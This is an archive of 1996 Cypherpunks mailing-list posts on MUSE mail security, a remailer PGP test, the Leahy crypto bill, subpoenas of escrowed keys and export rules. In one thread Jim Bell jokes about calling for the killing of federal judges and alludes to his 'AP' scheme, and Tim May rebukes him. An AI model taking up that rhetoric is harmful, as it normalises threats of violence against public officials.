From: John Gilmore <gnu@toad.com>
Date: Wed, 27 Mar 1996 02:03:58 +0800
To: gnu@toad.com
Subject: MUSE (Mail Ubiquitous Security Extensions) discussion starting
Message-ID: <9603260842.AA07183@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Don Eastlake has written an internet-draft proposing to add signatures
and encryption to the Internet mail-delivery system.  The two big
differences between his proposal and past proposals are:

	*  They work at the "sendmail" level, not at the "mail reader"
	   level.  This doesn't give your mail complete end-to-end protection
	   (unless you use "mail reader" encryption like S/MIME or PGP).
	   But it's a lot easier to install and maintain; your sysadmin
	   can do it for your whole site, instead of having to retrain
	   every user.

	*  They use the Domain Name System to keep the keys.  Since
	   DNS is going to distribute keys for its own authentication,
	   these can also be used to provide authenticated public keys
	   for remote host machines, so that email destined for those
	   machines can be encrypted.  With existing systems, getting
	   and validating keys is a big problem.

I encourage cypherpunks to read his draft and to participate in the
discussion and/or implementation that results.

The general MUSE web page is at http://www.imc.org/ietf-muse/.  You
can find the hypermail'd mailing list archives there, as well as the
Internet-Draft (draft-eastlake-muse-00.txt).  I hope that soon the
Web page will tell you how to join or exit the mailing list, too!

One initial technical question I have about MUSE is why to bother
encapsulating email messages while in transit in more layers of MIME
glop?  Why not just run IP Security between the sendmail daemons
involved, and have the receiving sendmail daemon note in the Received
header that the message arrived over an authenticated connection?
IPSEC provides your choice of authentication and/or encryption, and
already uses the keys from the Domain Name System.  IPSEC solves many
other problems as well as the particular secure/private email delivery
problem.  And deploying a Real Application (sendmail) that uses IPSEC
would shake it out and get it widely used.

	John Gilmore




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Tue, 26 Mar 1996 22:50:52 +0800
To: cypherpunks@toad.com
Subject: shellback.com remailer PGP test
Message-ID: <2.2.32.19960325184739.0067c330@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've gotten PGP functionality added (I *think*!) to the RemailerBot
software, and would like to ask folks to send a PGP-encrypted message or two
to remailer@shellback.com

Here's the public key for it...

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzE0kfEAAAEEALf5sIOqMfEAFi3geJ6aofyaCRy1ZJt8D91QBqPPeU1X3ond
BoIcEcfaMf7s3cOBaiEl7rKFMYqEpL08G7FFelQxc1WRvsR5XtTN+xFB3j0RPNON
vMxju5j6anjPVb2RMnowSYqNKUWIEYd4Soa7L+ZWpaHgLSGkhb6Ex2tu6LdpAAUR
tCFSZW1haWxlciA8cmVtYWlsZXJAc2hlbGxiYWNrLmNvbT6JAJUDBRAxNJK/xWtO
/Jg7MBkBAfiVBACk6dDtebwemmY2+nxK+WD46a0Uj/lwpXLGzJvixdYGo4mwYG2/
LUw/23xBNxLIvPCFR8Qvt9zguyPdMWAp07I64ZlL6yv9Co3DETtTLB8wBdPce6Wx
CLswIWAQ3MSLOmgVB35TzOYrYf5RzYtNKktCl3YDa9mxV4sug9xAx5uxvw==
=9EvL
- -----END PGP PUBLIC KEY BLOCK-----

Many thanks.....

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMVbN2MVrTvyYOzAZAQHi6QP+L+weAV1HrfNRNYgBjbcsSpcFpxa2yXoY
hXvzgooGJHFNT3CfqaDt68InoF58Y4CrMTpsg7YgL5SqKTLqm9gqNk5bT9krN+K8
KonCbd4uH4MVo2HQOhQdCMTyoVu6oCXVbBWO8Q3ltl5q+o4rxgG5BDs0IBrGWd8J
yIdjYPNjPVo=
=dbJR
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ned Freed <NED@INNOSOFT.COM>
Date: Wed, 27 Mar 1996 03:30:06 +0800
To: John Gilmore <gnu@toad.com>
Subject: Re: MUSE (Mail Ubiquitous Security Extensions) discussion starting
In-Reply-To: <9603260842.AA07183@toad.com>
Message-ID: <01I2S0UBDAI0A8CRXS@INNOSOFT.COM>
MIME-Version: 1.0
Content-Type: text/plain


> One initial technical question I have about MUSE is why to bother
> encapsulating email messages while in transit in more layers of MIME
> glop?  Why not just run IP Security between the sendmail daemons
> involved, and have the receiving sendmail daemon note in the Received
> header that the message arrived over an authenticated connection?

Because this gives you a point-to-point solution. MUSE is still end-to-end; the
only difference is that the ends have moved slightly away from the user in the
interests of deployment expediency.

> IPSEC provides your choice of authentication and/or encryption, and
> already uses the keys from the Domain Name System.  IPSEC solves many
> other problems as well as the particular secure/private email delivery
> problem.  And deploying a Real Application (sendmail) that uses IPSEC
> would shake it out and get it widely used.

IPSEC does indeed solve many problems. Unfortunatly secure email end-to-end
email isn't one of them.

				Ned




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 27 Mar 1996 00:21:21 +0800
To: jamesd@echeque.com
Subject: Re: LIST OF SHAME VOLUNTEERS
In-Reply-To: <199603260346.TAA29765@mail1.best.com>
Message-ID: <UlJtwkG00YUv99UWFO@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 25-Mar-96 Re: LIST OF SHAME VOLUNTEERS by
jamesd@echeque.com 
> > Leahy Bill has NOT A CHANCE IN HELL of passing, and so is worth
> > supporting to raise awareness of crypto.
>  
> Washington is the last place where we wish to raise awareness of
> crypto

I disagree. We can let our opponents exclusively dictate the terms of
the debate, or we can let our view (and the truth) be heard.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Wed, 27 Mar 1996 11:36:10 +0800
To: cypherpunks@toad.com
Subject: Re: Let's *NOT* "Raise their Awareness"
Message-ID: <2.2.32.19960325205224.006866dc@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 11:25 PM 03/25/96 -0800, tcmay@got.net (Timothy C. May) wrote:
>
>I try to avoid "me too" echoes, but this is worth concurring with, strongly.
>
>Nothing good can come out of "raising awareness," especially of an issue
>where the Consitution is already pretty clearly on the side of the right to
>speak in whatever language one chooses, to keep diaries in code if one
>wishes, to whisper to others, to place curtains on windows, to lock doors,
>and so on. (I suppose Jim Bell will point out that the Constitution
>contains no explicit language about placement of curtains....)

Regrettably, I must disagree with Mr. May on the matter of speaking in
whatever language one chooses. It seems that here in Texas (specifically,
here in Amarillo), a local judge informed a Hispanic family that they were
prohibited from speaking _only_ Spanish to their child at home. The
rationale was that since English is the (ostensibly, in this area) Public
Language of the school system here, failure to encourage use of English
would adversely impact the child's education, and was thus a form of child
abuse. If need be, I can provide excerpts from the local snoozepapers
coverage of the issue.

*sigh*

One Freedom at a time......

Dave Merriman
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMVbp7cVrTvyYOzAZAQHuTwP8DbhSO4PuMKl8/W/pNHCc2UsRCLSCADW3
JV5wJqh0H+z959tGx6zcB+WTjHSXMz/ZKsQFxGnJ40fKDj4YXOclRZraqgVPngHh
nrBzPNs0eZMJujecIE9v+JHJdIGmLKlkH9XQgmA4eqUF0ivGz9yLD4aVVyOjew45
f/okXaXbjeA=
=UUyW
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 27 Mar 1996 03:35:12 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <m0u1NSG-00093TC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960326055002.28374B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Mar 1996, jim bell wrote:

> At 12:23 PM 3/25/96 -0800, Timothy C. May wrote:
> 
> >I don't see any compelling need for U.S. legislation. And given the
> >pressures to attach all sorts of language to bills, I think it best that no
> >legislation happen.
> 
> [stuff deleted]
> 
> >IMPORTANT NOTE: It is often said, in a correct interpretation I think, that
> >a third party holding a key (Joe's Key Warehouse) is _not_ covered by the
> >5th Amendment's protections against self-incrimination, and so must honor a
> >subpoena. Sounds accurate to me. 
> 
> While this may end up looking like another of Jim Bell's odd 
> interpretations, the only section in the US Constitution that I see as 
> potentially REQUIRING a person's testimony is the section (can't recall 
> which) which says that a defendant must have a process to compel the 
> appearance of witnesses in his favor.  The Constitution, as far as I see, 
> says nothing about requiring people to appear for the PROSECUTION.

You're talking about the 6th amendment confrontation clause.  Really, 
that's unrelated to requests for production of documents via the 
subpoena process, which is more related to the due process clause.

Like I said in a related message, I have seen fines of $75,000 a day leveled 
against "bad faith" third parties for not complying with grand jury 
subpoenas for documents.

 
> I know that plenty of judges just automatically assume that this requirement 
> is somehow in there, but a literal reading of the Constitution doesn't 
> provide it.  If that's the case, the government has and should have no 
> mechanism to force any key escrow agent to reveal a key.

Unfortunately, this is incorrect.  Subpoena power is immensely potent in 
the United States, and is arguably the most violent extraterratorial 
exercise of American sovreignty there is.

> >However, what if Joe is _also_ one's
> >lawyer? Does attorney-client privilege apply here? Perhaps. A better
> >solution is also fully legal at this time: use only offshore key storage. A
> >U.S. subpoena to Vince's Offshore Key Repository will carry no weight in
> >Anguilla. (Can I be compelled to ask Vince to send my key? Sure. But Vince
> >and I could have a stipulation that such "duress requests" will not be
> >honored, no matter how loudly I squawk.)
> 
> I've always been astonished at the assumption that the government seems to 
> be making that key escrow (which is fundamentally done for the benefit of 
> the key holder) will be implemented in a way that could possibly help the 
> cops out, in a way done to the detriment of the key holder.  

It's no different than a safety deposit box.  The bank is hardly going to 
endure prosecution and significant for withholding lawful access to a 
defendant's safety deposit box.
 
> 
> >>I do feel that it should be possible for courts to sub poena crypto keys,
> >>but that doesn't really need new law either (4th and 5th ammendments
> >>become _really_ important though (hmmm- there advantages to writing down a
> >>constitution after all :)
> >
> >I agree that subpoenas for keys are legit. While I may dislike giving up my
> >key, in a criminal matter it seems like "just another document." If they
> >can subpoena my diary, my phone records, my dentist bills, why not another
> >this document? Nothing in the Constitution giving it special status.
> 
> But are subpoenas _really_ constitutional?  In any case, one of the effects 
> of the widespread availability of good encryption might be that suddenly the 
> documents that cops have historically thought were subpoena-able will no 
> longer be.  That's life, although they won't like it.

And Ohio never joined the union and thus is a tax haven, yadda, yadda, yadda.

Please.

They are as "subpoena-able" as the escrow agent is unwilling to bear the 
burden of multi-million dollar fines and the defendant unwilling to bear 
the burden of incarceration.

You know, I didn't know who was writing this message until I got down 
here and my screen scrolled, but I had my suspicions.
 
> Jim Bell
> jimbell@pacifier.com

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 27 Mar 1996 04:06:49 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <Pine.SUN.3.91.960325214107.7695I-100000@viper.law.miami.edu>
Message-ID: <Pine.SUN.3.91.960326060016.28374C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Mar 1996, Michael Froomkin wrote:

> On Mon, 25 Mar 1996, Timothy C. May wrote:
> 
> [...many things including...]
> > 
> > (Michael Froomkin speculated in one of his articles, I don't recall which,
> > that there might need to be certain guidelines or laws if a key escrow
> > protocol were to invoke the U.S. court system. Maybe. But I think ordinary
> 
> It's my clipper article, see the link from my homepage.  The claim 
> (disputed, BTW, by many experts) is that it's not obvious that the 
> constitution allows judges to hold keys in the absence of an onging 
> judicial proceeding involving the owner of the key because the separation 
> of powers would classify this action as "executive".
> 
> > contract law, about what a contract says and what it means, is adequate. If
> > I pay Joe's Key Warehouse a fee to store my key and it loses it, or gives
> > it to another party, then damages can be collected.)
> > 
> I agree that absent a statute all that is involved is contract law.
> 
> [...]
> 
> > IMPORTANT NOTE: It is often said, in a correct interpretation I think, that
> > a third party holding a key (Joe's Key Warehouse) is _not_ covered by the
> > 5th Amendment's protections against self-incrimination, and so must honor a
> > subpoena. Sounds accurate to me. However, what if Joe is _also_ one's
> > lawyer? Does attorney-client privilege apply here? Perhaps. A better
> 
> NO IT DOES NOT.  Basic rule of thumb: your lawyer can't be used to hide 
> papers someone else can't hide.  Ok, at the margin it gets tricky, but 
> bascially the privilege is not going to stretch to your key.
> 
> > solution is also fully legal at this time: use only offshore key storage. A
> > U.S. subpoena to Vince's Offshore Key Repository will carry no weight in
> > Anguilla. (Can I be compelled to ask Vince to send my key? Sure. But Vince
> > and I could have a stipulation that such "duress requests" will not be
> > honored, no matter how loudly I squawk.)
> 
> An interesting issue, likely to be addressed in future judicial 
> assistence treaties...

Practally speaking, this is incorrect.  While most nations complain about 
the application of U.S. law abroad in discovery, unless the foreign 
entity has no U.S. presence what so ever, they are highly vulnerable to 
subpoenas.

Either today or tommorow I'll post a massive article on asset protection 
to the list which discusses many aspects of international subpoena powers 
and jurisprudence in relation to bank documents, and in some cases, 
computer disks and information.

It may answer this question more completely.

> 
> [...]
> 
> A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
> Associate Professor of Law | 
> U. Miami School of Law     | froomkin@law.miami.edu
> P.O. Box 248087            | http://www.law.miami.edu/~froomkin
> Coral Gables, FL 33124 USA | It's warm here.
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 27 Mar 1996 02:29:33 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <2.2.32.19960326112653.00c3850c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:46 PM 3/25/96 -0500, Michael Froomkin wrote:

>An interesting issue, likely to be addressed in future judicial 
>assistence treaties...
>

However, future judicial assistance treaties are meaningless if you store
your keys anonymously (domestically or internationally) so that even the
keeper doesn't know he has them or exactly where they are in his pile of keys.

In general, I think that we should attack government key escrow on economic
efficiency grounds by pointing out that it is unlikely that "socialized key
escrow" would do as good a job as private enterprise key escrow.  The
Stalinist method of industrial production, is well known for its
inefficiencies and similar inefficiencies attach to government key escrow.

In fact, I suppose that government operation of the identification system
(drivers' licenses, passports, etc.) in general is also horribly inefficient
and should be attacked on efficiency grounds.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Wed, 27 Mar 1996 02:25:44 +0800
To: Cypherpunks List <cypherpunks@toad.com>
Subject: Instant Internet
Message-ID: <Pine.OSF.3.91.960326082443.24567A-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



Has anyone had any experience with Instant Internt - a 
networking/firewall program? I have a client who is interested in this 
software and is concerned about security. I have little info other than 
sales noise and I would like an opinion from someone who has actually 
used it.

Thanks

Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robichaux, Paul E" <perobich@ingr.com>
Date: Wed, 27 Mar 1996 03:41:12 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Remailer restrictions: coming soon to your burg?
Message-ID: <c=US%a=_%p=INTERGRAPH%l=HQ6960326082809HN003700@hq14.pcmail.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


Josh Quitter recounts the sorry tale of a small-town city councilman whose 
phone number got attached to one of those phone-sex ads in alt.binaries.*. 
See 
<http://pathfinder.com/@@EGI8H7KFBQAAQAGs/time/magazine/domestic/1996/960401  
/web.html> for full details.

So, what does the councilman do? From the article:
>On Feb. 6, at Suponcic's urging, the Willowick city council passed a 
resolution asking the state
>and federal governments to close the "loopholes" that allowed anonymous 
remailers to operate
>outside the authority of U.S. law-enforcement officials. "Once you've 
achieved one of these
>anonymous identities, you're dangerous, and there's no way law enforcement 
can track it,"
>Suponcic says. "The animal's out of control." 

Just like with "communications decency", watch out at the local level.

-Paul






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 27 Mar 1996 03:30:32 +0800
To: cypherpunks@toad.com
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <199603261412.JAA45884@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tim May wrote:

[...]

>> However, what if Joe is _also_ one's
>> lawyer? Does attorney-client privilege apply here? Perhaps....

and Professor Froomkin responded:

>NO IT DOES NOT.  Basic rule of thumb: your lawyer can't be used to hide 
>papers someone else can't hide.  Ok, at the margin it gets tricky, but 
>bascially the privilege is not going to stretch to your key.

Professor Froomkin is right (IMO) but I think that the way he puts
this understates the size of the margin when it comes to cryptokeys.

If I were a US Attorney, I would bide my time and pick a hard case,
involving lots of potentially incriminating (and therefore tempting)
encrypted files, an available key, and (at least) two horsemen. The
unavailability of the key can then be presented as a "technicality,"
allowing a bad guy to possibly get off. After I get some precedent
it can then be streched over those inconvenient provisions in the
Bill of Rights. This is how "hard cases make bad law."

>> solution is also fully legal at this time: use only offshore key storage. >> A
>> U.S. subpoena to Vince's Offshore Key Repository will carry no weight in
>> Anguilla. (Can I be compelled to ask Vince to send my key? Sure. But Vince
>> and I could have a stipulation that such "duress requests" will not be
>> honored, no matter how loudly I squawk.)
>
>An interesting issue, likely to be addressed in future judicial 
>assistence treaties...

I agree, but if I were sitting at Anguilla's side of the table (I
won't be, and I have no idea what they will do) this point would
be a *very* expensive one. Anguilla and other tax-haven countries
have little to gain and much to lose by becoming less friendly to
the financial privacy of the Vince Cates of this world.
JMR

Regards, Jim Ray <liberty@gate.net>

"Isn't it true that the exponential and incredible growth of the
 Internet came about because the government kept their hands off
 of it?" -- Judge Stewart Dalzell.
_______________________________________________________________________
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Public Key id. #  E9BD6D35   --   http://www.shopmiami.com/prs/jimray
_______________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMVf2321lp8bpvW01AQGJnQP8DAhTpnU2memnJta0muU1K2d0N7nhgCwK
FCR0R5N6VCJbYu4rXovTlSXevWOkCOPasbZ6DKCzDGHFzQc9KUyc1FCbB4tlYqCr
taGXcNKkYafQYF9VBGxUcuOhCb04TvOV1r3+QGqQ7OFvNJppF1YEsUBaO3MclFGW
nDetMEwEtJI=
=Mu5a
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kermie@paonline.com (Dan Ringley)
Date: Wed, 27 Mar 1996 03:40:02 +0800
To: cypherpunks@toad.com
Subject: Re: DESCRIBE
Message-ID: <v05000500ad7dabd636ba@[198.69.90.213]>
MIME-Version: 1.0
Content-Type: text/plain


Take me off of the God Forbidden list already! Now!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 27 Mar 1996 19:46:38 +0800
To: cypherpunks@toad.com
Subject: SEC_oil
Message-ID: <199603261600.LAA25885@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   3-26-96. WSJ:

   "SEC Says Brewery May Use Internet to Offer Its Stock."

      The episode is extraordinary in that it shows the power
      of the Internet to free companies from their traditional
      market limitations, says Spring Street President
      Andrew Klein, who says. "My phone's been ringing off 
      the hook from companies that want to know how they can 
      sell a piece of their companies to the public using 
      this technology, without paying underwriters or 
      brokers and without having to give the company away 
      to venture capitalists."

   SEC_oil






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 27 Mar 1996 05:18:40 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <ad7cdcd10e02100463fc@[205.199.118.202]>
Message-ID: <199603261611.LAA04815@homeport.org>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:

| My point is that I see no compelling legislation that is needed. If enough
| people in Washington really want increased length in _exported products_
| (remember the "exported" part), the Congress and the President should find
| it easy enough to get said products on to the Approved List. (I note that
| the Leahy Bill really doesn't change this system anyway...some products go
| on the list, some don't...the law only seems to say that when the horse has
| already left the barn, i.e., when "comparable" products are already in
| fairly wide use outside the U.S., then the products should be put on the
| approved list. Big deal.

	Tim,

	I'm forced to disagree on this point.  I think that the
comparable product has the potential to be a very big deal; it means
that any product using IDEA or 3DES may become exportable, because
such products are available outside the US.

	It may be that wide use will be quibbled over, but DES, weak
as it is, is widely used outside the US, and IDEA and 3DES will be.
Thats why this legistlation will fail to pass.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 27 Mar 1996 16:05:20 +0800
To: cypherpunks@toad.com
Subject: Re: Let's *NOT* "Raise their Awareness"
Message-ID: <ad7d6e610f02100496cd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:52 PM 3/25/96, David K. Merriman wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>At 11:25 PM 03/25/96 -0800, tcmay@got.net (Timothy C. May) wrote:
>>
>>I try to avoid "me too" echoes, but this is worth concurring with, strongly.
>>
>>Nothing good can come out of "raising awareness," especially of an issue
>>where the Consitution is already pretty clearly on the side of the right to
>>speak in whatever language one chooses, to keep diaries in code if one
>>wishes, to whisper to others, to place curtains on windows, to lock doors,
>>and so on. (I suppose Jim Bell will point out that the Constitution
>>contains no explicit language about placement of curtains....)
>
>Regrettably, I must disagree with Mr. May on the matter of speaking in
>whatever language one chooses. It seems that here in Texas (specifically,
>here in Amarillo), a local judge informed a Hispanic family that they were
>prohibited from speaking _only_ Spanish to their child at home. The
>rationale was that since English is the (ostensibly, in this area) Public
>Language of the school system here, failure to encourage use of English
>would adversely impact the child's education, and was thus a form of child
>abuse. If need be, I can provide excerpts from the local snoozepapers
>coverage of the issue.

Right, and I've cited this "family law" case recently here in Cyphepunks as
an example of an aberrant, unconstitutional law (family law has a lot of
such things...it may come from the hard-to-untangle situation of a family).

I don't take specific statutes or interpretations, such as this example, as
being the same as what the Constitution says. Though it may come to the
point where what's in the Constitution is buried under a blizzard of such
exceptions and special cases.

In any case, I think the First Amendment is a better protection of
cryptographic rights than is some putative (and arguably nonexistent)
"right to privacy."

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 27 Mar 1996 15:05:57 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Bad news from Judge Richey
Message-ID: <m0u1eXu-0008yBC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:16 PM 3/26/96 -0800, Timothy C. May wrote:
>At 6:29 PM 3/26/96, jim bell wrote:
>
>>Now now, Tim.  You know me better than that.  You know that I would never be
>>so restrained as to call for the killing of ONLY ONE federal judge.
>
>Your sense of humor is also called "digging your own grave." Better hope
>your words don't get to prosecutors anxious to set an example....

I don't think they'd be stupid enough to do that.  Even a fool knows that 
what I really want is publicity, and that is exactly what the government 
would be best advised NOT to give me.  If they decided to press the issue, 
it would turn into one of the purest 1st amendment cases that has ever 
existed. Worse for them, it would automatically publicize my AP idea to an 
audience of millions, which I believe would cook their goose but good.  They 
know this, and they know that harassing me will not stop the fundamental idea.


>>Seriously, however, I think you slightly mis-read my letter.  The implied
>>"threat", if you are inclined to call it that, would simply be that if
>>domestic
>>software writers are prohibited from exporting encryption software, they
>>might be inclined (and have time for) writing the entire AsPol system into
>...
>
>I read your article as essentially saying:
>
>"Judges ought to remember that a box of shells costs a lot less than an appeal."

Good line!  But what I really meant was,

"Jim Bell is advocating building an ammunition factory."

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 27 Mar 1996 12:08:29 +0800
To: cypherpunks@toad.com
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <ad7d71ae100210045d46@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:11 PM 3/26/96, Adam Shostack wrote:
>Timothy C. May wrote:
>
>| My point is that I see no compelling legislation that is needed. If enough
>| people in Washington really want increased length in _exported products_
>| (remember the "exported" part), the Congress and the President should find
>| it easy enough to get said products on to the Approved List. (I note that
>| the Leahy Bill really doesn't change this system anyway...some products go
>| on the list, some don't...the law only seems to say that when the horse has
>| already left the barn, i.e., when "comparable" products are already in
>| fairly wide use outside the U.S., then the products should be put on the
>| approved list. Big deal.
>
>        Tim,
>
>        I'm forced to disagree on this point.  I think that the
>comparable product has the potential to be a very big deal; it means
>that any product using IDEA or 3DES may become exportable, because
>such products are available outside the US.

I certainly don't disagree that if Leahy is passed, which is unlikely, then
conventional ciphers like 3DES will become exportable. (And I am forced to
add, "Big deal.")

What I'm more interested in are not the ciphers which had their genesis in
the crypto work of the 70s, but in the new and exciting applications to
come. Things such as this list often discusses. I believe Leahy could stall
export of these new items until eventually there are offshore equivalents
of sufficiently wide deployment that the Leahy clause would get invoked.

Leahy does little to confirm basic Constitutional rights, and offers a sop
to the export control advocates. And the criminalization of use of crypto
in furtherance of a felony (any of the 14,662 felonies now on the books),
according to the reading of several analysts who have studied Leahy, is
disturbing. Whether it can be used to prosecute operators of anonymous
remailers remains unclear, but associating cryptography with criminality
more directly and statutorily than it is now is NOT a step in the direction
we want to see!

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 27 Mar 1996 10:31:14 +0800
To: cypherpunks@toad.com
Subject: Weapons & Hope
Message-ID: <2.2.32.19960326164226.00681648@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


With all of the folderol about the repeal of the Assault Rifle non Ban and
the risks to the polity from Assault Encryption, it is important to note
that this is Much Ado About Nothing.

If these gals are worried about a few AK's, what's going to become of their
peace of mind when confronted with nanotechnology.

It is not technologically feasibly to develop a pile of advanced
technologies that do not contain weapons or defenses of some kind.
Technology gives one the power to do things.  The power to "do things" is a
superset of the power to attack or defend (the power of weaponry).  A weapon
is basically an instrument for projecting force or (in the case of defenses)
blocking that projection.  As technology advances, more and more powerful
instrumentalities are placed in individual hands.

This is particularly the case with modern machines and markets.  Whereas
past practice involved mass production of identical products from very
specialized production machinery, the current trend is moving towards custom
products produced by "general" machines.  While it might be barely possible
in the mass production age to control weapons by blocking the flow of these
specific products (a Streetsweeper, say) into the marketplace, it will
clearly not be possible  in the age of custom production.  General machines
will be available to produce specialized products (often under the direct
control of the customer, himself).  Some of this custom production will be
weapons.

DCF

"Gee, I never knew Chuck Schumer was brave enough to attack another military
force armed only with an 'Assault Handgun.'  He must be because if he ain't
then it ain't (an assault handgun, that is) because no one else would be
that crazy." 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 27 Mar 1996 15:22:17 +0800
To: Victor Ramon Aguilar Ocampo <aguilar@servidor.dgsca.unam.mx>
Subject: Re: About Triple DES ......
In-Reply-To: <Pine.SV4.3.91.960326141838.9870D-100000@servidor>
Message-ID: <Pine.SUN.3.92.960326124610.23985A-100000@elaine41.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Victor Ramon Aguilar Ocampo escribe:

>    Please let me know if TRIPLE DES is regulated by the same rules than
> the others criptography systems in USA.

Yes. Apparently there's even a standard place on the export request forms
to check off "please resubmit without triple-DES support." If this is
something you want to be able to take across the border, you need to get
it from a non-US source.

>    We want to use it here in National Autonomous University of Mexico, so
> we don't want to get jailed.

